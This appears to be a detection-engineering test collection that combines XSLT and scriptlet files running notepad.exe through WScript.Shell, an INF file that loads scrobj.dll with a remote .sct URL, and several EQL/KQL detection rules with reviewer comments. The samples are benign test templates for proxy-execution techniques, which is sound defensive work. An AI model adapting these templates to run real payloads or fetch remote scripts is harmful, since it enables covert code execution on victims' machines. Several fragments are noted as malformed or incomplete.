
<?xml version='1.0'?>
<!--
  XSLT 1.0 stylesheet carrying a Microsoft script extension (ms:script in the
  urn:schemas-microsoft-com:xslt namespace, language JScript). A processor that
  honours ms:script will execute the CDATA body, which instantiates
  WScript.Shell and runs notepad.exe; no template logic is defined otherwise.
  NOTE(review): the stylesheet end tag is not shown here, so the document as
  rendered is not well-formed; confirm against the original file.
  Literals worth matching on for detection: the ms: namespace URI,
  implements-prefix="user" and ActiveXObject("WScript.Shell").
-->
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="Jscript">
<![CDATA[
var x = new ActiveXObject("WScript.Shell").Run("notepad.exe");
]]></ms:script>
<?XML version="1.0"?>
<!--
  Windows Script Component (.sct) registered with progid/description "Empire".
  NOTE(review): the declaration target is upper-case "XML", which is not valid
  XML 1.0 even if the scriptlet host tolerates it; a strict parser rejects this
  file. The closing tags and the script element/CDATA wrapper that would
  normally enclose the VBScript below are not present as rendered; confirm
  against the original file. The progid, the description and the classid
  suffix FEEDACDC are fixed literals a defender can match on.
-->
<scriptlet>
<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{20001111-0000-0000-0000-0000FEEDACDC}"
>
' Creates a WScript.Shell instance, launches notepad.exe and exits the host.
Dim shl
Set shl = CreateObject("Wscript.Shell")
Call shl.Run("notepad.exe")
Set shl = Nothing
WScript.Quit
<?XML version="1.0"?>
<!--
  Second Windows Script Component, registered as progid/description "Bandit".
  Only the registration element is shown; no script body is present in this
  rendering. NOTE(review): same upper-case "XML" declaration target as the
  first scriptlet, so a strict XML parser rejects it. The classid shares the
  FEEDACDC suffix with the "Empire" scriptlet above, a stable literal for
  detection.
-->
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
</registration>
; Setup information (.inf) file.
; NOTE(review): the signature uses mixed case ("$WiNdows NT$") rather than the
; usual "$Windows NT$"; it presumably still validates because INF signature
; matching is case-insensitive (confirm). Mixed-case signatures are a cheap
; way to evade naive string matching, so match case-insensitively.
[version]
signature=$WiNdows NT$
; Single-user install section whose only directive is UnRegisterOCXs, which
; points at the [D9AB] section below.
[DefaultInstall_SingleUser]
UnRegisterOCXs=D9AB
; Entry appears to follow the <file>,<flags>,<argument> form: %11% is the INF
; DirId for the system directory, the file is scrobj.dll, and the argument is
; an https URL to notepad.sct hosted on gist. That URL and the loading of
; scrobj.dll with a remote argument are the concrete indicators to alert on.
[D9AB]
%11%\scrobj.dll,NI,https://gist.githubusercontent.com/Samirbous/f581143f7ce4c3697f31d8780c1c45c6/raw/054f3af511b37dae556789161bbea1ad222b5f65/notepad.sct
[Strings]
; Both string values are a single-space placeholder.
serviceName=" "
shortSvcName=" "
// Sequence per host.id, window 1 minute:
//   1) a successful logon (event.action "logged-in") for a domain/local
//      account SID (S-1-5-21-*), attributed to process.pid 0, via the NTLM
//      package (LogonProcessName NtLmSsp*), LogonType 3 (network) and a
//      loopback source address, then
//   2) any process start carrying the same TargetLogonId.
// NOTE(review): only the IPv4 loopback "127.0.0.1" is matched; if the data
// source can report "::1" that case is missed. The missing space in
// `"NtLmSsp*"and` parses but is easy to misread.
sequence by host.id with maxspan=1m
[authentication where event.action : "logged-in" and
event.outcome == "success" and user.id: "S-1-5-21-*" and
process.pid == 0 and
winlog.event_data.LogonProcessName:"NtLmSsp*"and
winlog.event_data.LogonType == 3 and source.ip == "127.0.0.1"] by winlog.event_data.TargetLogonId
[process where event.type == "start"] by winlog.event_data.TargetLogonId
// Sequence per host.hostname, window 1 minute, pairing two views of what is
// meant to be one connection on the same host:
//   1) an outbound (egress/outgoing) non-DNS connection from a process other
//      than spoolsv.exe, not running as SYSTEM, with both ports in the dynamic
//      range (>= 49152), then
//   2) an inbound (ingress/incoming) non-DNS connection accepted by
//      spoolsv.exe running as SYSTEM, again with both ports >= 49152.
// NOTE(review): the join swaps the address keys (egress destination.address
// against ingress source.address and vice versa) while keeping the port keys
// in the same order; that only lines up when source and destination address
// are equal (e.g. loopback traffic). It may be deliberate for a same-host
// pairing; confirm against the data before widening the rule.
sequence by host.hostname with maxspan=1m
[network where network.direction : ("egress", "outgoing") and
process.name != "spoolsv.exe" and not network.protocol == "dns" and not user.name : "SYSTEM" and
source.port >= 49152 and destination.port >= 49152] by destination.address,source.address, destination.port, source.port
[network where process.name : "spoolsv.exe" and user.name : "SYSTEM" and
network.direction : ("ingress", "incoming") and
not network.protocol == "dns" and
source.port >= 49152 and destination.port >= 49152] by source.address, destination.address, destination.port, source.port
// Process start of 32-bit Internet Explorer with exactly two arguments
// (args_count > 1 and <= 2) where no argument matches the iexplore.exe path.
// NOTE(review): on many data sources process.args includes the executable as
// its first element; if that holds here, the final clause excludes every
// event and the rule never fires. Confirm what the source populates (full
// path, short path, quoting) before relying on it.
process where event.action : "start" and
process.executable : "?:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" and
process.args_count <= 2 and process.args_count > 1 and
not process.args : "?:\\Program Files (x86)\\Internet Explorer\\iexplore.exe"
// Sequence per host.id, window 1 second:
//   1) a process creation whose parent is winword/excel/powerpnt, excluding
//      WerFault.exe and splwow64.exe children that carry two or more
//      arguments, then
//   2) termination of a winword/excel/powerpnt process whose own parent is
//      an Office app, explorer.exe, outlook.exe or thunderbird.exe.
// The join (process.parent.entity_id from step 1 against process.entity_id
// in step 2) makes the terminated process the parent that spawned the child.
// NOTE(review): this rule keys on event.action "creation_event" /
// "termination_event" while sibling rules above use event.type == "start" or
// event.action : "start"; these are different data-source conventions and
// the rules are not interchangeable across sources.
sequence by host.id with maxspan=1s
[process where event.action : "creation_event" and
process.parent.name : ("winword.exe", "excel.exe", "powerpnt.exe") and
not (process.executable : ("?:\\Windows\\System32\\WerFault.exe", "?:\\WINDOWS\\splwow64.exe") and
process.args_count >= 2)
] by process.parent.entity_id
[process where event.action : "termination_event" and
process.name : ("winword.exe", "excel.exe", "powerpnt.exe") and
process.parent.name : ("winword.exe", "excel.exe", "powerpnt.exe", "explorer.exe", "outlook.exe", "thunderbird.exe")
] by process.entity_id
event.code:4688 and winlog.event_data.TargetUserSid:"S-1-0-0" and
not winlog.event_data.TargetDomainName:("NT Service" or "Font Driver Host") and
not winlog.event_data.TargetUserName:("LOCAL SERVICE" or "NETWORK SERVICE") and
not winlog.event_data.TargetUserName:"defaultuser100000" and
not winlog.event_data.TargetUserName:- and
not winlog.event_data.TargetUserName:*$